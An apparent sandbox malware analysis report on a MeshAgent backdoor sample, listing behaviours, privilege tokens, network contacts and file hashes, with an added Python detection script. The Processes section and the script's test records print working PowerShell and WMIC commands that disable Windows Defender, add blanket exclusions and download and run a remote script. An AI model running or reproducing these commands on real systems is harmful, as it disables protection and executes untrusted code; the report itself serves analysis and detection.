Malware Analysis Report

2024-10-23 20:15

Sample ID 241016-n55xbssarl
Target 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch
SHA256 54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6
Tags
upx discovery execution meshagent backdoor persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54eb6f4d6682a9f61182fef1b6162019fd205710b14fee3719bce58ba9d3bcc6

Threat Level: Known bad

The file 2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch was found to be: Known bad.

Malicious Activity Summary

upx discovery execution meshagent backdoor persistence rat trojan

Detects MeshAgent payload

MeshAgent

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Checks installed software on the system

Drops file in System32 directory

UPX packed file

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious behavior: CmdExeWriteProcessMemorySpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-16 12:00

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-16 11:59

Reported

2024-10-16 12:02

Platform

win7-20240708-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob not captured in this export) C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2412 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2412 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2412 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 2804 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2972 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2972 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2972 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe C:\Windows\system32\cmd.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2748 wrote to memory of 2776 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\install.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2776 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\install.exe C:\Windows\SysWOW64\msiexec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2684 wrote to memory of 688 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; CiTool.exe -rp \"{PolicyId GUID}\" -json; powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')\" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -

C:\Windows\System32\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c "Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) -ArgumentList @('begin')"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c install.exe

C:\Users\Admin\AppData\Local\Temp\install.exe

install.exe

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 71A874F1A3A05924F5C0B10E1827D917 C
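Detection logic for the process chain listed above, added here as an example; it is not code from the report or from the sandbox vendor. It runs Sysmon-style process-creation records (constructed below to mirror the PIDs and command lines in this section, with an assumed explorer.exe parent PID 1500 and one benign control) through rules for the behaviours the chain shows: Set-MpPreference/Add-MpPreference tampering and the MSFT_MpPreference WMI call, the Net.WebClient download cradle wrapped in [scriptblock]::Create, -ExecutionPolicy Bypass, msiexec /i on a .tmp package, and LOLBins spawned by an executable living in %TEMP%. Field names (pid, ppid, image, cmd) are assumptions; the CiTool.exe part of the original command line is left out of the constructed record.

```python
import re
from collections import defaultdict

# Rules keyed on command-line content, derived from the command lines recorded above.
RULES = {
    "defender_tampering": re.compile(
        r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion(?:Path|Extension)"
        r"|MSFT_MpPreference\s+call\s+Add", re.I),
    "download_cradle": re.compile(
        r"Net\.WebClient\)?\s*\.\s*Download(?:String|Data|File)\s*\(|Invoke-WebRequest|Invoke-RestMethod", re.I),
    "scriptblock_create": re.compile(r"\[scriptblock\]::Create\s*\(", re.I),
    "execution_policy_bypass": re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.I),
    "msiexec_tmp_package": re.compile(r"msiexec(?:\.exe)?\"?\s+/i\s+\S+\.tmp\b", re.I),
}
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
LOLBINS = {"powershell.exe", "wmic.exe", "cmd.exe", "msiexec.exe", "mshta.exe", "rundll32.exe"}
HIGH = {"defender_tampering", "download_cradle", "scriptblock_create"}

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS_TAMPER = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive " '
             r"Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; "
             r"Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
             r'WMIC /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"C:\*\"; '
             r'powershell -nop -ExecutionPolicy Bypass -c \"Invoke-Command -ScriptBlock ([scriptblock]::Create('
             r"[System.Text.Encoding]::UTF8.GetString((New-Object Net.WebClient).DownloadData("
             r"'https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) "
             "-ArgumentList @('begin')\\\" \"")
PS_CRADLE = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ExecutionPolicy Bypass -c '
             r'"Invoke-Command -ScriptBlock ([scriptblock]::Create([System.Text.Encoding]::UTF8.GetString('
             r"(New-Object Net.WebClient).DownloadData('https://github.com/Idov31/MrKaplan/releases/download/V1.1.1/MrKaplan_Standalone.ps1')))) "
             "-ArgumentList @('begin')\"")

EVENTS = [  # constructed to mirror the PIDs in the WriteProcessMemory table; 1500 and 3000 are assumed
    {"pid": 2972, "ppid": 1500, "image": SAMPLE, "cmd": f'"{SAMPLE}"'},
    {"pid": 2412, "ppid": 2972, "image": PS, "cmd": PS_TAMPER},
    {"pid": 2740, "ppid": 2412, "image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmd": r'"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\*'},
    {"pid": 2804, "ppid": 2412, "image": PS, "cmd": PS_CRADLE},
    {"pid": 2748, "ppid": 2972, "image": r"C:\Windows\system32\cmd.exe", "cmd": r"C:\Windows\system32\cmd.exe /c install.exe"},
    {"pid": 2776, "ppid": 2748, "image": r"C:\Users\Admin\AppData\Local\Temp\install.exe", "cmd": "install.exe"},
    {"pid": 2612, "ppid": 2776, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp"},
    {"pid": 3000, "ppid": 1500, "image": PS, "cmd": "powershell.exe -NoProfile -Command Get-Date"},  # benign control
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Map pid -> sorted rule tags for every event that trips at least one rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(set)
    for e in events:
        for tag, rx in RULES.items():
            if rx.search(e["cmd"]):
                hits[e["pid"]].add(tag)
        parent = by_pid.get(e["ppid"])
        if basename(e["image"]) in LOLBINS and parent and TEMP_DIR.search(parent["image"]):
            hits[e["pid"]].add("lolbin_spawned_from_temp")
        if TEMP_DIR.search(e["image"]):
            hits[e["pid"]].add("exe_from_temp")  # low signal alone: legitimate installers do this too
    return {pid: sorted(tags) for pid, tags in hits.items()}


def severity(tags):
    return "high" if HIGH & set(tags) else "medium"


def report(events):
    """Flagged processes as (pid, image basename, severity, tags), high severity first."""
    hits = detect(events)
    rows = []
    for e in events:
        if e["pid"] in hits:
            rows.append((e["pid"], basename(e["image"]), severity(hits[e["pid"]]), hits[e["pid"]]))
    return sorted(rows, key=lambda r: (r[2] != "high", r[0]))


if __name__ == "__main__":
    for row in report(EVENTS):
        print(*row)
```

The parent/child rule is what separates this chain from an administrator running Set-MpPreference by hand: here the PowerShell that disables Defender was spawned by an unsigned executable in the user's Temp directory, and the WMI fallback (MSFT_MpPreference call Add) is a second attempt at the same exclusion in case the cmdlet is blocked, so both rules should page even when only one fires.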

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.logflare.app udp
US 172.67.144.216:443 api.logflare.app tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp

Files

memory/2972-5-0x0000000000DF0000-0x0000000004568000-memory.dmp

memory/2412-9-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

memory/2412-8-0x000000001B760000-0x000000001BA42000-memory.dmp

memory/2412-7-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp

memory/2412-6-0x0000000002B40000-0x0000000002BC0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 68ef68415ba57219816065c9af471b99
SHA1 0d027a4abb658610f507c6562b288b04f6b37151
SHA256 9e8d3a55a68c3296389311d8b7d07527b00362655b852ddd05994c75a9e33950
SHA512 baf717e9759ffd35d6c0d153bde17ab8ea4138d5c3ac6bbb1fc5a2c155e678f748459ebeddfeeb5adb4236711b54d422cfe71cd45a23a547f35eabe86d3cd219

memory/2412-20-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/2412-21-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\install.exe

MD5 979ce82b2ea35a92fae6a60c6c3e3791
SHA1 8d260eea0151ee7a6aae88eb2e9015d5efb2603b
SHA256 be86cadf405e9f617601da44bab88f08b3e92ac4349a2616378a9195722925ca
SHA512 ec67c1d20ae0f9fffcf471d60f2ade6e08fd5a0e572ee1b58036ce11c5f353db93b622c795fe013a0dbe91fe4921b5ba50c312b8c51716d5cc4921d2050f2724

C:\Users\Admin\AppData\Local\Temp\MSI96C3.tmp

MD5 6d9b5a3b75da266db5c237b0ac70b7f9
SHA1 9ce4aa208974b299ce0abeaf043740616f4f0b02
SHA256 d57614b838f083937ff98c161e55fa60b5d23de639818ad6eef8335ba23c031b
SHA512 fb458b1c2d3b9da748b1775b1bf2098fbe5076a0bc3daf2a93e1be978e3b7e34bc7a75c2660ef97cac3e7ba23ebceae1785dfe8ac124440f34dbd248cd92571d

C:\Users\Admin\AppData\Local\Temp\MSI9B17.tmp

MD5 684f2d21637cb5835172edad55b6a8d9
SHA1 5eac3b8d0733aa11543248b769d7c30d2c53fcdb
SHA256 da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0
SHA512 7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

memory/2412-35-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

memory/2972-36-0x0000000000DF0000-0x0000000004568000-memory.dmp

memory/2972-38-0x0000000000DF0000-0x0000000004568000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-16 11:59

Reported

2024-10-16 12:02

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-16_5bfa176d4d484262d8762d97bcd2b784_snatch.exe"

Signatures

Detects MeshAgent payload

Description Indicator Process Target
N/A N/A N/A N/A

